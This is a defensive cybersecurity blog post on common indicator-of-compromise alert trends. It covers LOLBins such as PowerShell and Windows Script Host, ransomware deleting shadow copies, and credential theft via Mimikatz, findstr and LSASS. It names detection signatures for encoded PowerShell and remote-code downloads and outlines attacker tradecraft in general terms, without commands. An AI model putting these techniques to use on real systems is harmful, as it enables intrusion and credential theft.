Here is a fact, you always need to keep in the mind:
For every novel (new) attack technique discovered, there are countless attacks taking place somewhere in the same time frame that use well-known and well-trodden tactics. For every attack carried out by a nation state, there’s a dozen million-dollar ransomware attacks that still started with a simple phishing email.
This is why watching the trends is so important: it provides a view of what you’re most likely to encounter.
Does it make sense?
Thus, in this post we are going to look at a larger swath of the IoC alerts to see what’s most frequently encountered by companies of all sizes.
-
Signal From The Noise
One of the biggest issues security guys face is 'alert fatigue'. Many have claimed, i.e., 93 percent said they receive at least 5,000 alerts per day. In circumstances like this, it’s absolutely critical for you to be able to derive-- what’s important from what can be discarded.
The vast majority of alerts fall into the low and medium severity categories (35 and 50 percent, respectively). It may be tempting to ignore alerts with lower severities outright. Indeed, in some circumstances, this may be the correct course of action. BUT NOT ALWAYS…
Under some circumstances, low severity alerts can be just as concerning as a critical severity alert. The trick is to figure out the context surrounding them. What happened before and after an alert? Are there other lower-severity alerts in the same time frame? Stringing together a series of suspicious alerts can give a much clearer picture of potential attacks that may only alert on lower severity IoCs.
For example, let’s say an attacker sends a phishing email to your organization. If the recipient opens the Word attachment, a macro contained within launches a script (triggering the IoC W32.WinWord.Powershell.ioc). The script in turn runs encoded PowerShell commands (W32.PowershellEncodedBuffer.ioc) to set the stage to download further malicious code (W32.PowershellDownloadString.ioc).
This scenario is comprised entirely of low- and medium-severity IoCs. Each of these by themselves do not necessarily point to an attack, but when viewed as a string of IoCs, it’s very unlikely that these would be associated with anything but malicious activity. At the end of the day, the idea with the lower IoC categories is that they indicate activity within your environment that should be investigated.
LOLBins
Utilizing the tools built into operating systems is a very common attack tactic these days. Leveraging such readily available binaries decreases the chances that an attacker will be discovered, compared to custom-tailored malicious tools that can stand out. Using readily available tools for malicious activity is generally referred to as “living off the land,” and the binaries utilized are called LOLBins.
20-27% of the IoC alerts organizations encountered at least once in a given month are related to suspicious LOLBin activity.
Two LOLBins in particular appear to dominate the top LOLBin IoCs seen:
1. PowerShell
2. Windows Scripting Host (covering both WScript and CScript).
Both of these LOLBins facilitate the execution of scripts within the Windows operating system. In many cases, PowerShell is used to download malicious code into memory or download further executables. The Windows Scripting Host is often leveraged to launch malicious files, perform reconnaissance, move throughout the network, or contact remote locations.
In the picture given above, you can take a look at the two primary desktop operating systems, Windows and macOS, to see how attackers are targeting them. I have marked the presence of LOLBins in each.
What’s interesting in looking at the malicious use of these native binaries is that bad actors often leverage one LOLBin to launch another. Malicious actors likely swap LOLBins during an attack in order to hide their tracks.
Adware appears quite frequently on macOS as well, comprising four of the top ten IoCs seen. What’s interesting is that LOLBins don’t appear as frequently here as they do on Windows. Instead, attackers are likely to hide their presence by disabling the security programs, excluding their files from quarantine, clearing command histories, and hiding files.
-
• The most common IoC alert seen relating to ransomware is the deletion of shadow copies, which are snapshots of the file system used by the Windows operating system for backups. Ransomware threats often delete these files to prevent encrypted files from being restored from local backups. This particular IoC comprised 66 percent of all ransomware-related IoC alerts.
• The most commonly encountered credential stealing tool, Mimikatz, was already mentioned in my previous post. Apart from Mimikatz, malicious actors were seen utilizing the Findstr utility on files, digging through LSASS, and combing through the registry in order to find credentials.
• Adware features heavily on both Windows and macOS operating systems. Adware appearing in the top five generally behave in a manner closer to malware than a simple annoyance of showing you an unexpected advertisement.
-
How Can You Defend?
If you’re going to do one thing with this new information to protect your organization, focus your efforts on what consistently crops up in these lists: LOLBins.
Of course, this may be easier said than done, not only because these binaries are baked into the OS, but because many IT organizations utilize them in their daily operations. So how do you differentiate between normal operations and malicious activity? While it’s fairly obvious when some actions are being carried out by bad actors, others are not so clear.
First and foremost, it’s important to ensure you enable adequate logging on systems. The fact is you can’t pinpoint malicious activity if there’s no record of it.
It’s also important to have a clear understanding of the types of commands and activity that you can expect within these logs. Filtering out what you know is being carried out through automation or IT activities will clear out much of the noise, making it easier to drill down into what should be there.
It’s also important look for patterns. Individual activities and commands may not appear malicious on their own, but in the context of a series of commands, ran before and after, a malicious pattern may emerge. Create playbooks that address these patterns and use automation to detect when they trigger.
When it comes to what commands and activities are expected, every organization is different. Establishing your approach often requires the involvement a variety of people from different teams. Establishing those communications will not only help when building out a defensive plan, but can be critical in quickly resolving an incident if one arises.
-
Please let me know of what do you think about this in the comment section. You can also share with all if the information shared here helps you in some manner.
If you are truly interested in reading more of such high-quality posts on cybersecurity, you can always let me know by leaving your comments.
This Article Was Written & published by Meena R, Senior Manager - IT, at Luminis Consulting Services Pvt. Ltd, India.
Over the past 16 years, Meena has built a following of IT professionals, particularly in Cybersecurity, Cisco Technologies, and Networking...
She is so obsessed with Cybersecurity domain that she is going out of her way and sharing hugely valuable posts and writings about Cybersecurity on website, and social media platforms.
30,000+ professionals are following her on Facebook and mesmerized by the quality of content of her posts on Facebook.
If you haven't yet been touched by her enthusiastic work of sharing quality info about Cybersecurity, then you can follow her on Facebook:
Click Here to follow her: Cybersecurity PRISM